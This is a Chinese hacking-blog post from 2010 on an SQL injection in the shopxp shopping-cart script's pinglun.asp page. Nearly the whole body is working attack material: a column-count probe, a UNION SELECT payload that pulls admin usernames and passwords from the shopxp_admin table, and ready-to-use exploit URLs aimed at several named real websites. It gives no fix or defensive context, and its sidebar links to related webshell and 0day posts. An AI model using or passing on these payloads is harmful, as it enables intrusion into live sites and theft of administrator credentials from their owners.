shopxp pinglun.asp 注入漏洞 - 漏洞分析,shopxp,admin,学习|渗透|注射|备忘|资料|收集|网文|入侵|注入|工作室|久久久电脑工作室|久久久|st999|电脑|电脑工作室|久久久电脑| - Powered by Sablog-X

shopxp pinglun.asp 注入漏洞

2010, July 17, 10:23 AM. 漏洞分析

Submitted by admin

shopxp pinglun.asp 注入漏洞（已有人公布）

http://192.168.1.14/admin/pinglun.asp?id=131%20order%20by%2011

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from shopxp_admin

http://yqt.mzhuangg.com/admin%5Fshopxp/pinglun.asp?id=131%20and%201=2%20union%20select%201,2,admin,4,password,6,7,8,9,10,11%20from%20shopxp_admin

http://www.steinelchina.com/eding/admin%5Fshopxp/pinglun.asp?id=131%20and%201=2%20union%20select%201,2,admin,4,password,6,7,8,9,10,11%20from%20shopxp_admin

http://www.beijing-bike.com/admin/pinglun.asp?id=131%20and%201=2%20union%20select%201,2,admin,4,password,6,7,8,9,10,11%20from%20shopxp_admin

http://www.siemens-vdo.com.cn/admin%5Fshopxp/pinglun.asp?id=131%20and%201=2%20union%20select%201,2,adminid,4,5,password,7,8,9,admin,11%20from%20shopxp_admin

Tags: shopxp

« 上一篇 | 下一篇 »

只显示10条记录相关文章

shopxp html版2.0直接添加管理员漏洞 (浏览: 11049, 评论: 0)
ShopXp CMS上传拿Webshell (浏览: 10581, 评论: 0)
SHOPXP网上购物系统 v8.0 (浏览: 13519, 评论: 0)
SHOPXP网上购物系统 v8.0 注入漏洞利用 (浏览: 10405, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 11594, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)

Trackbacks

发表评论

注册 | 登陆

网名：流浪的风，QQ：470032103，安全交流群：36799078;本博客为个人笔记之地，不喜勿入；有类似helen心理的，请勿加群！

日志分类

热门标签

discuz [23]
dedecms [20]
oday [18]
ecshop [18]
phpcms [15]
上传 [13]
网趣 [11]
dede [9]
注入 [8]
shopxp [7]
shopex [7]
无忧 [6]
ewebeditor [6]
dvbbs [6]
mssql [6]

搜索文章

最新评论

博客信息

分类数量: 18
文章数量: 468
评论数量: 7
标签数量: 254
附件数量: 492
引用数量: 0
注册用户: 1
今日访问: 212
总访问量: 3744052
程序版本: 1.6

51.la

{title}